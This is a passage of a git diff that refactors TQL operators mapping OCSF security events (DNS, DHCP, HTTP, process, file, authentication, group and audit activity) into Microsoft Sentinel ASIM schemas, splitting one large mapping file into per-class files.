+microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql new file mode 100644 index 0000000..2b95d96 --- /dev/null +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -0,0 +1,22 @@ +--- +description: OCSF DHCP Activity event -> Microsoft Sentinel ASIM DhcpEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.dhcp_event" +asim.EventSchema = "DhcpEvent" +asim.EventSchemaVersion = "0.1.1" +match activity_name { + "Ack" | "Offer" => { asim.EventType = "Assign" } + "Request" => { asim.EventType = "Renew" } + "Release" => { asim.EventType = "Release" } + _ => { asim.EventType = "Assign" } +} +asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcMacAddr = src_endpoint?.mac? +assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql new file mode 100644 index 0000000..c84f776 --- /dev/null +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -0,0 +1,26 @@ +--- +description: OCSF DNS Activity event -> Microsoft Sentinel ASIM Dns event. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.dns" +asim.EventSchema = "Dns" +asim.EventSchemaVersion = "0.1.7" +asim.EventType = query?.opcode? else "Query" +match activity_name { + "Query" => { asim.EventSubType = "request" } + "Response" => { asim.EventSubType = "response" } + _ => {} +} +asim.DnsQuery = query?.hostname? +asim.DnsQueryTypeName = query?.type? +asim.DnsQueryClassName = query?.class? +asim.EventResultDetails = rcode? else "NA" +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? +asim.DstIpAddr = dst_endpoint?.ip? +asim.DstHostname = dst_endpoint?.hostname? +assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql new file mode 100644 index 0000000..831ce0d --- /dev/null +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -0,0 +1,40 @@ +--- +description: OCSF Entity Management event -> Microsoft Sentinel ASIM AuditEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.audit_event" +asim.EventSchema = "AuditEvent" +asim.EventSchemaVersion = "0.1.2" +asim.EventType = "Other" +match activity_name { + "Create" => { asim.EventType = "Create" } + "Read" => { asim.EventType = "Read" } + "Update" | "Set" => { asim.EventType = "Set" } + "Delete" => { asim.EventType = "Delete" } + "Execute" => { asim.EventType = "Execute" } + "Install" => { asim.EventType = "Install" } + "Clear" => { asim.EventType = "Clear" } + "Enable" => { asim.EventType = "Enable" } + "Disable" => { asim.EventType = "Disable" } + "Start" => { asim.EventType = "Start" } + "Stop" => { asim.EventType = "Stop" } + _ => {} +} +asim.Operation = activity_name? else type_name? else asim.EventType +asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ObjectType = "Directory Service Object" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.TargetHostname = dst_endpoint?.hostname? +asim.TargetIpAddr = dst_endpoint?.ip? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql new file mode 100644 index 0000000..8644640 --- /dev/null +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -0,0 +1,40 @@ +--- +description: OCSF Event Log Activity event -> Microsoft Sentinel ASIM AuditEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.audit_event" +asim.EventSchema = "AuditEvent" +asim.EventSchemaVersion = "0.1.2" +asim.EventType = "Other" +match activity_name { + "Create" => { asim.EventType = "Create" } + "Read" => { asim.EventType = "Read" } + "Update" | "Set" => { asim.EventType = "Set" } + "Delete" => { asim.EventType = "Delete" } + "Execute" => { asim.EventType = "Execute" } + "Install" => { asim.EventType = "Install" } + "Clear" => { asim.EventType = "Clear" } + "Enable" => { asim.EventType = "Enable" } + "Disable" => { asim.EventType = "Disable" } + "Start" => { asim.EventType = "Start" } + "Stop" => { asim.EventType = "Stop" } + _ => {} +} +asim.Operation = activity_name? else type_name? else asim.EventType +asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ObjectType = "Event Log" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.TargetHostname = dst_endpoint?.hostname? +asim.TargetIpAddr = dst_endpoint?.ip? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql new file mode 100644 index 0000000..c53fb0d --- /dev/null +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -0,0 +1,37 @@ +--- +description: OCSF File System Activity event -> Microsoft Sentinel ASIM FileEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.file_event" +asim.EventSchema = "FileEvent" +asim.EventSchemaVersion = "0.2.2" +match activity_name { + "Create" => { asim.EventType = "FileCreated" } + "Read" | "Open" => { asim.EventType = "FileAccessed" } + "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } + "Delete" => { asim.EventType = "FileDeleted" } + "Rename" => { asim.EventType = "FileRenamed" } + _ => { asim.EventType = "FileCreatedOrModified" } +} +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.TargetFilePath = file?.path? else file?.name? +asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] +if activity_name == "Rename" and file_result? != null { + asim.SrcFilePath = asim.TargetFilePath + asim.SrcFileName = asim.TargetFileName + asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" + asim.TargetFilePath = file_result.path? else asim.TargetFilePath + asim.TargetFileName = file_result.name? else asim.TargetFileName +} +asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" +assert asim.ActorUsername != null and asim.TargetFilePath != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql new file mode 100644 index 0000000..5d18efd --- /dev/null +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -0,0 +1,42 @@ +--- +description: OCSF Group Management event -> Microsoft Sentinel ASIM UserManagement event. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.user_management" +asim.EventSchema = "UserManagement" +asim.EventSchemaVersion = "0.1.2" +asim.EventSeverity = asim.EventSeverity? else "Informational" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + +match activity_name { + "Create" => { asim.EventType = "GroupCreated" } + "Delete" => { asim.EventType = "GroupDeleted" } + "Add User" => { asim.EventType = "UserAddedToGroup" } + "Remove User" => { asim.EventType = "UserRemovedFromGroup" } + "Read" => { asim.EventType = "GroupRead" } + _ => { asim.EventType = "GroupModified" } +} + +asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? +if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" +} +asim.TargetUserId = user?.uid? +asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.GroupName = group?.name? +asim.GroupId = group?.uid? +asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql similarity index 100% rename from microsoft/operators/ocsf/asim/common.tql rename to microsoft/operators/asim/ocsf/helpers/common.tql diff --git a/microsoft/operators/asim/ocsf/helpers/finalize.tql b/microsoft/operators/asim/ocsf/helpers/finalize.tql new file mode 100644 index 0000000..f55a356 --- /dev/null +++ b/microsoft/operators/asim/ocsf/helpers/finalize.tql @@ -0,0 +1,7 @@ +--- +description: Finalizes an initialized ASIM event and preserves the original OCSF event. +--- + +asim.AdditionalFields = {...this} +drop asim.AdditionalFields.asim +this = asim diff --git a/microsoft/operators/ocsf/asim/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql similarity index 73% rename from microsoft/operators/ocsf/asim/unsupported.tql rename to microsoft/operators/asim/ocsf/helpers/unsupported.tql index fe57184..9388c7d 100644 --- a/microsoft/operators/ocsf/asim/unsupported.tql +++ b/microsoft/operators/asim/ocsf/helpers/unsupported.tql @@ -1,5 +1,5 @@ --- -description: Drops unsupported OCSF → ASIM mappings with a warning. +description: Drops unsupported OCSF -> ASIM mappings with a warning. --- assert false, message={ diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql new file mode 100644 index 0000000..2a4b1e6 --- /dev/null +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -0,0 +1,19 @@ +--- +description: OCSF HTTP Activity event -> Microsoft Sentinel ASIM WebSession. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.web_session" +asim.EventSchema = "WebSession" +asim.EventSchemaVersion = "0.2.7" +asim.EventType = "HTTPsession" +asim.Url = http_request?.url?.url_string? +asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper() +asim.EventResultDetails = http_response?.code?.string() else status_code?.string() +if http_response?.code? != null { + asim.EventResult = "Success" if http_response.code < 400 else "Failure" +} +assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql new file mode 100644 index 0000000..e59945c --- /dev/null +++ b/microsoft/operators/asim/ocsf/map.tql @@ -0,0 +1,57 @@ +--- +description: Validated OCSF 1.8 event -> Microsoft Sentinel ASIM event. +--- + +match class_uid { + 2003 => { + microsoft::asim::ocsf::compliance_finding + } + 2004 => { + microsoft::asim::ocsf::detection_finding + } + 1006 => { + microsoft::asim::ocsf::scheduled_job_activity + } + 1008 => { + microsoft::asim::ocsf::event_log_activity + } + 3004 => { + microsoft::asim::ocsf::entity_management + } + 201004 => { + microsoft::asim::ocsf::windows_service_activity + } + 3002 => { + microsoft::asim::ocsf::authentication + } + 3003 => { + microsoft::asim::ocsf::authorize_session + } + 3001 => { + microsoft::asim::ocsf::account_change + } + 3006 => { + microsoft::asim::ocsf::group_management + } + 1007 => { + microsoft::asim::ocsf::process_activity + } + 1001 => { + microsoft::asim::ocsf::file_system_activity + } + 4001 => { + microsoft::asim::ocsf::network_activity + } + 4002 => { + microsoft::asim::ocsf::http_activity + } + 4003 => { + microsoft::asim::ocsf::dns_activity + } + 4004 => { + microsoft::asim::ocsf::dhcp_activity + } + _ => { + microsoft::asim::ocsf::helpers::unsupported + } +} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql new file mode 100644 index 0000000..1077e0f --- /dev/null +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -0,0 +1,33 @@ +--- +description: OCSF Network Activity event -> Microsoft Sentinel ASIM NetworkSession. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.network_session" +asim.EventSchema = "NetworkSession" +asim.EventSchemaVersion = "0.2.7" +asim.EventType = "NetworkSession" +asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? +asim.SrcPortNumber = src_endpoint?.port? +asim.DstIpAddr = dst_endpoint?.ip? +asim.DstHostname = dst_endpoint?.hostname? +asim.DstPortNumber = dst_endpoint?.port? +asim.SrcBytes = traffic?.bytes_out? +asim.DstBytes = traffic?.bytes_in? +match disposition? { + "Allowed" => { + asim.DvcAction = "Allow" + asim.EventResult = "Success" + } + "Blocked" | "Denied" => { + asim.DvcAction = "Deny" + asim.EventResult = "Failure" + asim.EventSeverity = asim.EventSeverity? else "Low" + } + _ => {} +} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql new file mode 100644 index 0000000..6437521 --- /dev/null +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -0,0 +1,31 @@ +--- +description: OCSF Process Activity event -> Microsoft Sentinel ASIM ProcessEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.process_event" +asim.EventSchema = "ProcessEvent" +asim.EventSchemaVersion = "0.1.4" +match activity_name { + "Launch" => { asim.EventType = "ProcessCreated" } + "Terminate" => { asim.EventType = "ProcessTerminated" } + _ => { microsoft::asim::ocsf::helpers::unsupported } +} +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() +asim.ParentProcessId = actor?.process?.parent_process?.pid?.string() +asim.TargetProcessId = process?.pid?.string() +asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1] +asim.TargetProcessCommandLine = process?.cmd_line? +asim.TargetUserId = user?.uid? +assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql new file mode 100644 index 0000000..09e300d --- /dev/null +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -0,0 +1,40 @@ +--- +description: OCSF Scheduled Job Activity event -> Microsoft Sentinel ASIM AuditEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.audit_event" +asim.EventSchema = "AuditEvent" +asim.EventSchemaVersion = "0.1.2" +asim.EventType = "Other" +match activity_name { + "Create" => { asim.EventType = "Create" } + "Read" => { asim.EventType = "Read" } + "Update" | "Set" => { asim.EventType = "Set" } + "Delete" => { asim.EventType = "Delete" } + "Execute" => { asim.EventType = "Execute" } + "Install" => { asim.EventType = "Install" } + "Clear" => { asim.EventType = "Clear" } + "Enable" => { asim.EventType = "Enable" } + "Disable" => { asim.EventType = "Disable" } + "Start" => { asim.EventType = "Start" } + "Stop" => { asim.EventType = "Stop" } + _ => {} +} +asim.Operation = activity_name? else type_name? else asim.EventType +asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ObjectType = "Scheduled Task" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.TargetHostname = dst_endpoint?.hostname? +asim.TargetIpAddr = dst_endpoint?.ip? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql new file mode 100644 index 0000000..0238afc --- /dev/null +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -0,0 +1,40 @@ +--- +description: OCSF Windows Service Activity event -> Microsoft Sentinel ASIM AuditEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.audit_event" +asim.EventSchema = "AuditEvent" +asim.EventSchemaVersion = "0.1.2" +asim.EventType = "Other" +match activity_name { + "Create" => { asim.EventType = "Create" } + "Read" => { asim.EventType = "Read" } + "Update" | "Set" => { asim.EventType = "Set" } + "Delete" => { asim.EventType = "Delete" } + "Execute" => { asim.EventType = "Execute" } + "Install" => { asim.EventType = "Install" } + "Clear" => { asim.EventType = "Clear" } + "Enable" => { asim.EventType = "Enable" } + "Disable" => { asim.EventType = "Disable" } + "Start" => { asim.EventType = "Start" } + "Stop" => { asim.EventType = "Stop" } + _ => {} +} +asim.Operation = activity_name? else type_name? else asim.EventType +asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ObjectType = "Service" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.TargetHostname = dst_endpoint?.hostname? +asim.TargetIpAddr = dst_endpoint?.ip? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql new file mode 100644 index 0000000..c1db810 --- /dev/null +++ b/microsoft/operators/ocsf/map.tql @@ -0,0 +1,15 @@ +--- +description: Microsoft event -> OCSF. +args: + positional: + - name: log + description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + default: null +--- + +if $log != null { + _microsoft_ocsf_log = $log + microsoft::windows::ocsf::map _microsoft_ocsf_log +} else { + microsoft::graph::ocsf::map +} diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql deleted file mode 100644 index 78c01ef..0000000 --- a/microsoft/operators/ocsf/map_to_asim.tql +++ /dev/null @@ -1,344 +0,0 @@ ---- -description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event. ---- - -let $threat_categories = { - adware: "Adware", - cryptominer: "Cryptominor", - malware: "Malware", - phishing: "Phishing", - ransomware: "Ransomware", - rootkit: "Rootkit", - spam: "Spam", - spoofing: "Spoofing", - spyware: "Spyware", - trojan: "Trojan", - virus: "Virus", - worm: "Worm", -} - -microsoft::ocsf::asim::common - -match class_uid { - 2003 | 2004 => { - @name = "asim.alert_event" - asim.EventSchema = "AlertEvent" - asim.EventSchemaVersion = "0.1" - asim.EventType = "Alert" - asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? - assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - - asim.AlertName = finding_info?.title? else message? - asim.EventReportUrl = finding_info?.url? else null - asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat" - asim.ThreatName = malware?[0]?.name? else finding_info?.title? - if class_uid == 2003 { - asim.ThreatCategory = "Security Policy Violation" - } else { - asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? - } - asim.ThreatOriginalCategory = finding_info?.types?[0]? - asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? - asim.UserId = user?.uid? else actor?.user?.uid? - asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null - match status? { - "New" | "Active" | "In Progress" => { - asim.AlertStatus = "Active" - } - "Resolved" | "Closed" => { - asim.AlertStatus = "Closed" - } - _ => {} - } - asim.AlertOriginalStatus = status? - match verdict? { - "True Positive" => { asim.AlertVerdict = "True Positive" } - "False Positive" => { asim.AlertVerdict = "False Positive" } - "Benign" => { asim.AlertVerdict = "Benign Positive" } - "Unknown" => { asim.AlertVerdict = "Unknown" } - _ => {} - } - } - 1006 | 1008 | 3004 | 201004 => { - @name = "asim.audit_event" - asim.EventSchema = "AuditEvent" - asim.EventSchemaVersion = "0.1.2" - asim.EventType = "Other" - match activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } - _ => {} - } - asim.Operation = activity_name? else type_name? else asim.EventType - asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? - assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - match class_uid { - 1006 => { asim.ObjectType = "Scheduled Task" } - 1008 => { asim.ObjectType = "Event Log" } - 3004 => { asim.ObjectType = "Directory Service Object" } - 201004 => { asim.ObjectType = "Service" } - _ => {} - } - asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? - if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" - asim.ActorUsernameType = "Windows" - } - asim.ActorUserId = actor?.user?.uid? - asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null - asim.SrcIpAddr = src_endpoint?.ip? - asim.TargetHostname = dst_endpoint?.hostname? - asim.TargetIpAddr = dst_endpoint?.ip? - } - 3002 | 3003 => { - @name = "asim.authentication" - asim.EventSchema = "Authentication" - asim.EventSchemaVersion = "0.1.4" - match activity_name { - "Logoff" => { asim.EventType = "Logoff" } - _ => { asim.EventType = "Elevate" if class_uid == 3003 else "Logon" } - } - match logon_type? { - "System" => { asim.EventSubType = "System" } - "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { - asim.EventSubType = "Interactive" - } - "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } - "Remote Interactive" | "Cached Remote Interactive" => { - asim.EventSubType = "RemoteInteractive" - } - "OS Service" => { asim.EventSubType = "Service" } - _ => {} - } - if logon_type? != null { - asim.EventOriginalSubType = logon_type - } - asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? - if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" - asim.ActorUsernameType = "Windows" - } - asim.ActorUserId = actor?.user?.uid? - asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null - asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? - asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? - if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" - asim.TargetUsernameType = "Windows" - asim.TargetDomain = user.domain - asim.TargetDomainType = "Windows" - } - asim.TargetUserId = user?.uid? - asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null - asim.TargetSessionId = session?.uid? else session?.uid_alt? - asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcHostname = src_endpoint?.hostname? - asim.SrcPortNumber = src_endpoint?.port? - asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? - asim.TargetAppId = service?.uid? else dst_endpoint?.uid? - asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? - asim.LogonProtocol = auth_protocol? - if auth_factors? != null { - asim.LogonMethod = auth_factors[0]?.factor_type? - } - } - 3001 | 3006 => { - @name = "asim.user_management" - asim.EventSchema = "UserManagement" - asim.EventSchemaVersion = "0.1.2" - asim.EventSeverity = asim.EventSeverity? else "Informational" - asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? - if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" - asim.ActorUsernameType = "Windows" - } - assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - asim.ActorUserId = actor?.user?.uid? - asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null - - if class_uid == 3001 { - match activity_name { - "Create" => { asim.EventType = "UserCreated" } - "Delete" => { asim.EventType = "UserDeleted" } - "Update" => { asim.EventType = "UserModified" } - "Lock" => { asim.EventType = "UserLocked" } - "Unlock" => { asim.EventType = "UserUnlocked" } - "Disable" => { asim.EventType = "UserDisabled" } - "Enable" => { asim.EventType = "UserEnabled" } - "Password Change" => { asim.EventType = "PasswordChanged" } - "Password Reset" => { asim.EventType = "PasswordReset" } - _ => { asim.EventType = "UserModified" } - } - } else { - match activity_name { - "Create" => { asim.EventType = "GroupCreated" } - "Delete" => { asim.EventType = "GroupDeleted" } - "Add User" => { asim.EventType = "UserAddedToGroup" } - "Remove User" => { asim.EventType = "UserRemovedFromGroup" } - "Read" => { asim.EventType = "GroupRead" } - _ => { asim.EventType = "GroupModified" } - } - } - - asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? - if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" - asim.TargetUsernameType = "Windows" - } - asim.TargetUserId = user?.uid? - asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null - asim.GroupName = group?.name? - asim.GroupId = group?.uid? - asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null - asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcHostname = src_endpoint?.hostname? - } - 1007 => { - @name = "asim.process_event" - asim.EventSchema = "ProcessEvent" - asim.EventSchemaVersion = "0.1.4" - match activity_name { - "Launch" => { asim.EventType = "ProcessCreated" } - "Terminate" => { asim.EventType = "ProcessTerminated" } - _ => { microsoft::ocsf::asim::unsupported } - } - asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? - if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" - asim.ActorUsernameType = "Windows" - } - asim.ActorUserId = actor?.user?.uid? - asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null - asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() - asim.ParentProcessId = actor?.process?.parent_process?.pid?.string() - asim.TargetProcessId = process?.pid?.string() - asim.TargetProcessName = process?.name? else 